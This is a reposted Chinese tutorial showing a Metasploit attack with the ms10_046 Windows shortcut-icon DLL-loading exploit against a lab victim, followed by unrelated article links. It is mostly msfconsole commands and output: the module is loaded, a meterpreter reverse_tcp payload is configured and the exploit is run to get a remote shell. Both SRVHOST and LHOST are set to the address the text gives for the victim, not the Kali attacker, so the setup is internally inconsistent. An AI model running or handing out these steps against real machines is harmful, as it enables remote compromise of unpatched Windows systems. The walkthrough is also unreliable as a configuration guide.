kali攻防第11章攻击实例讲解-ms10_046快捷方式图标漏洞-白红宇

kali攻防第11章攻击实例讲解-ms10_046快捷方式图标漏洞

阅读量：4144 次

发布时间：2019-05-25

本文共 3360 字，大约阅读时间需要 11 分钟。

攻击实例讲解-ms10_046快捷方式图标漏洞

准备工具

1、kali系统 IP:10.10.10.131

2、受害者机子 IP:10.10.10.129

3、使用工具 msfconsole

步骤：

1、进入控制台

root@kali:~# msfconsole

+-------------------------------------------------------+

| METASPLOIT by Rapid7 |

+---------------------------+---------------------------+

| __________________ | |

| ==c(______(o(______(_() | |""""""""""""|======[*** |

| )=\ | | EXPLOIT \ |

| // \\ | |_____________\_______ |

| // \\ | |==[msf >]============\ |

| // \\ | |______________________\ |

| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |

| // \\ | ********************* |

+---------------------------+---------------------------+

| o O o | \'\/\/\/'/ |

| o O | )======( |

| o | .' LOOT '. |

| |^^^^^^^^^^^^^^|l___ | / _||__ \ |

| | PAYLOAD |""\___, | / (_||_ \ |

| |________________|__|)__| | | __||_) | |

| |(@)(@)"""**|(@)(@)**|(@) | " || " |

| = = = = = = = = = = = = | '--------------' |

+---------------------------+---------------------------+

Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit

=[ metasploit v4.11.5-2015103001 ]

+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]

+ -- --=[ 432 payloads - 37 encoders - 8 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

2、载入windows模块中的漏洞图标工具

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf exploit(ms10_046_shortcut_icon_dllloader) >

3、需要配置的参数

msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 80 yes The daemon port to listen on (do not change)

SSLCert no Path to a custom SSL certificate (default is randomly generated)

UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).

URIPATH / yes The URI to use (do not change).

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 10.10.10.129

SRVHOST => 10.10.10.129

4、返回信息

msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > show options ---查看配置信息

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 10.10.10.129 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 80 yes The daemon port to listen on (do not change)

SSLCert no Path to a custom SSL certificate (default is randomly generated)

UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).

URIPATH / yes The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 10.10.10.129

LHOST => 10.10.10.129

5、执行攻击

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

转载地址：http://jnuti.baihongyu.com/

你可能感兴趣的文章

【Python】学习笔记——-7.5、实例属性和类属性

查看>>

git中文安装教程

查看>>

虚拟机 CentOS7/RedHat7/OracleLinux7 配置静态IP地址 Ping 物理机和互联网

查看>>

Jackson Tree Model Example

Android使用webservice客户端实例

查看>>

[转]C语言printf

查看>>

C 语言学习---获取文本框内容及字符串拼接

查看>>

C 语言学习 --设置文本框内容及进制转换

查看>>

C 语言学习---判断文本框取得的数是否是整数

查看>>

C 语言学习---ComboBox相关、简单计算器

查看>>

C 语言学习---ComboBox相关、简易“假”管理系统